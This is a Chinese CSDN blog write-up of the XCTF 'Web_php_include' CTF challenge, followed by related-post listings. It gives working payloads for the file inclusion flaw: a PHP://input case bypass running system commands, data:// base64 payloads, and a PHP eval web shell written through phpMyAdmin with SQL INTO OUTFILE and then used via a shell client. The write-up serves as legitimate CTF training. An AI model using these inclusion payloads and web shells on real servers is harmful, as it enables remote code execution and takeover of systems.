【XCTF 攻防世界】WEB 高手进阶区 Web_php_include

最新推荐文章于 2022-04-21 14:28:29 发布
最新推荐文章于 2022-04-21 14:28:29 发布
阅读量1.4k 收藏 3
点赞数 3
分类专栏: CTF总结 # PHP CTF刷题 WEB 文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45844670/article/details/108180309
版权
CTF刷题 WEB 同时被 3 个专栏收录
26 篇文章 7 订阅
订阅专栏
CTF总结
12 篇文章 2 订阅
订阅专栏
PHP
7 篇文章 0 订阅
订阅专栏

目录

基础题解

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>

上面这段代码功能:上传内容中若有“php://”则删除

此处利用strstr()函数大小写的敏感性,进行绕过:

/?page=PHP://input

然后传入php语句

<?php  system("ls")  ?>

得到目录文件
在这里插入图片描述
然后可直接获得flag

<?php  system("cat fl4gisisish3r3.php")  ?>

注意:
现在好像不能直接在网页中显示flag,只有用bp才能看到
如下:
在这里插入图片描述

ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}

本题相关知识点:

php://input、php://output用法解析
php协议
php://详解

一题多解:

php文件包含

1.审计php代码,while函数根据page参数来判断php文件是否存在,如果存在此文件,则进行文件包含。

2.默认页面为http://127.0.0.1/index.php,设置为page值,可确保while为真

3.利用hello参数将执行内容显示,flag如图所示

http://192.168.100.161:50281/?page=http://127.0.0.1/index.php/?hello=%3C?system(%22ls%22);?%3E
http://192.168.100.161:50281/?page=http://127.0.0.1/index.php/?hello=%3C?show_source(%22fl4gisisish3r3.php%22);?%3E

%3C是<
%22是"
%3E是>
在这里插入图片描述

一句话木马

先用御剑扫描后台看到管理员界面
在这里插入图片描述
用户名为root,密码为空

然后进行数据库更改

SQL查询语句

SELECT "<?php eval(@$_POST['1']); ?>"
INTO OUTFILE '/tmp/test1.php'

添加一句话木马
在这里插入图片描述
然后打开中国剑蚁
输入url和密码
使用方法:在网址后加参数:
/?page=/tmp/test1.php
这里一定要注意,不能忘记tmp前面的/
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
得到flag

data://伪协议

既然过滤了php://的伪协议 我们可以使用其他协议来做这里使用data://伪协议

data://伪协议

php5.2.0起,数据流封装器开始有效,主要用于数据流的读取。如果传入的数据是PHP代码,就会执行代码

使用方法:
data://text/plain;base64,xxxx(base64编码后的数据)

<?php system("ls")?> base64编码后使用

/?page=data://text/plain/;base64,PD9waHAgc3lzdGVtKCJkaXIisssKT8%2b (注意编码后的+号要URL编码)

<?php system("cat fl4gisisish3r3.php")?> base64编码后使用

/?page=data://text/plain/;base64,PD9waHAgc3lzdGVtKCJjYXQgZmw0Z2lzaXNpc2gzcjMucGhwIik/Pg==

查看源码得到flag
在这里插入图片描述

data://伪协议+一句话木马

<?php eval($_POST["1"]); ?>
base64加密后拼接

/?page=data://text/plain/;base64,PD9waHAgZXZhbCgkX1BPU1RbeGlhb2h1YV0pOyA/Pg==

菜刀连接即可

(不用base64同样可以达到效果)

再或者
/index.php?page=data:text/plain,<?php system("ls"); ?>

Kal1
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
7.XCTF Web_php_include
山兔的博客
09-16 242
一打开网站,就看到了下面这串代码 <?php show_source(__FILE__); //查看文件 echo $_GET['hello']; //输出hello获取到的数据 $page=$_GET['page']; //变量page由参数page来决定 while (strstr($page, "php://")) { //当变量中有php://时, $page=str_replace("ph
[wp] 攻防世界 Web_php_include
MercyLin的博客
09-28 6797
<?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> strstr是对大小写敏感的,用大写PHP绕过...
XCTF-高手进阶Web_php_include
1stPeak's Blog
03-02 554
<?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 看源码,可能是不想让我们使用php://in...
攻防世界web高手进阶Web_php_include
llx101388627的博客
03-06 249
攻防世界web高手进阶Web_php_include 进入链接,可以看到部分源码: 分析一下,这里可以用GET方式上传两个参数:hello和page 其中,page会先通过strstr(A,B)函数 [在A中查找是否有B] 检查其中是否有"php://",如果有则会通过str_replace(A,B,C)函数 [将C中所有A替换为B] 将"php://"删去。 所以基本上就不可能用php://伪协议 但可以尝试data://text/plain 我们如果要知道flag在哪里,首先得知道有哪些文件 而要
攻防世界web进阶Web_php_include两种解法
hxhxhxhxx的博客
07-16 656
攻防世界web进阶Web_php_include两种解法题目函数知识详解第一种第二种 题目 函数知识 strstr:查找php://在page中的第一次位置,并返回位置参数 str-replace:将page中的php://替换为空 详解 明显一个代码审计的题目 首先,他get一个hello参数,然后输出,并没有实质作用 然后get一个page参数 检测$page参数中是否含有php:// 然后将php://全部替换为空 while无限循环,直到page中没有php://即可, 第一种 我们首先可以使用
XCTF攻防世界web.doc
09-19
XCTF攻防世界Web WriteUp】 在网络安全竞赛中,CTF(Capture The Flag)是一种常见的形式,其中“XCTF攻防世界”是一个专注于Web安全的平台,旨在帮助参与者提升网络安全技能,特别是Web应用的安全防御和攻击能力...
xctf.rar_HTML5自适应
09-19
这个"xctf.rar"压缩包包含了一个实现HTML5全屏滚动效果的源码,它能实现平滑滚动,并且能够自适应不同浏览器的显示。 全屏滚动,也称为全屏滑动或全景观览,是一种让网页内容以连续的全屏视图展示的设计方式。这种...
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
XCTF_A_应收管理标准功能培训.pptx
10-11
XCTF_A_应收管理标准功能培训】的PPT内容涵盖了Oracle财务系统的应收管理模块,这个模块是企业销售到收款流程中的关键部分。以下是基于提供的文件内容详细解析的知识点: 1. **销售到收款流程概览**: - 销售到...
XCTF_A_物料清单标准功能培训.pptx
10-11
XCTF_A_物料清单标准功能培训中,主要涵盖了Oracle系统的物料管理及相关流程,旨在提升用户对物料清单(BOM)的运用和理解。以下是详细的讲解内容: 1. **物料管理**: - **系统组织架构**:Oracle系统中的组织...
攻防世界2分题(Web_php_include
qq_45791542的博客
08-01 288
看题 一串简短的PHP代码,这里对page这个参数用str_replace函数进行了过滤,str_replace函数的作用是匹配前面一段字符,匹配到的话就替换成后面一段,所以这里的代码意思就是,假如我们传入的page参数包含php://就会被替换成空字符。并且判断page里面文件是否存在,存在则包含文件。 绕过str_replace函数,经查资料知道str_replace这个函数及其不安全 关于绕过函数str_replace的方法 1.大小写绕过 2. 双写绕过 这里用大小写绕过 抓包..
Web_php_include 和supersqli攻防世界xctf web
weixin_45689999的博客
03-03 461
Web_php_include 代码 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page);//相当于过滤了php:// } include($page...
攻防世界web高手(1-6)
bilala的博客
08-03 349
* baby_web 题目描述:想想初始页面是哪个 根据题目描述的提示,访问index.php后发现重定向,尝试抓包 访问得到flag:flag{very_baby_web} * Training-WWW-Robots 访问robots.txt,发现有访问得到flagcyberpeace{eac017d052248ca0093cc503b9e8ff07} php_rce Web_php_include <?phpshow_source(__FILE__);echo $_GET['he
攻防世界 Web_php_include 解题思路
xj28555的博客
07-07 4179
进入题目 一串简短的PHP代码,这里对page这个参数用str_replace函数进行了过滤,str_replace函数的作用是匹配前面一段字符,匹配到的话就替换成后面一段,所以这里的代码意思就是,假如我们传入的page参数包含php://就会被替换成空字符。并且判断page里面文件是否存在,存在则包含文件。 当然这题有多种解法,我这里就讲述三种。 第一种 绕过str_replace函数,对渗透测试有点了解的都知道str_replace这个函数及其不安全,可以利用大小写绕过,双写绕过等,这里我用
xctf刷题小记
quan9i的博客
04-21 1686
xctf部分题wp
攻防世界 Web_php_include write up
weixin_30872157的博客
09-19 999
攻防世界 Web_php_include write updirbuster 扫目录 发现phpinfo()可以看到绝对路径 和 phpmyadmin进入phpmyadmin页面 root直接空密码登录查看phpmyadmin变量 secure file priv 值为空 说明可以写入一句话load_file()可以读取任意文件.......在经过各种尝试写人一...
【BUUCTF】Web题目 WriteUp
Luminous_song的博客
03-12 5809
Web类题目
XCTF攻防世界 Web高手进阶 PHP2 writeup
Senimo
03-30 486
XCTF攻防世界 Web高手进阶 NaNNaNNaNNaN-Batman writeup PHP2 难度系数: 2.0 题目来源: 暂无 题目描述:暂无 启动靶机,打开环境: 你能浏览这个网站嘛? 首先访问index.php,可以正常访问,尝试查看index.phps文件(.phps文件就是php的源代码文件,通常用于提供给访问者查看php代码): 得到网页的源代码,分析代码: 需要传入变量...
攻防世界web进阶刷题记录(1)
bmth666的博客
03-27 4646
文章目录webbaby_webTraining-WWW-Robotsphp_rceWeb_php_include方法1方法2方法3warmupNewsCenter web baby_web 提示是:想想初始页面是哪个 进入是一个hello world,然后就没有了,由于提示试试抓包,得到flag Training-WWW-Robots 由于提示我们就查看robots.txt 获得flag p...
攻防世界traffic
最新发布
07-28
- *1* *2* [xctf攻防世界 Web高手进阶 easytornado](https://blog.csdn.net/l8947943/article/details/126174257)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值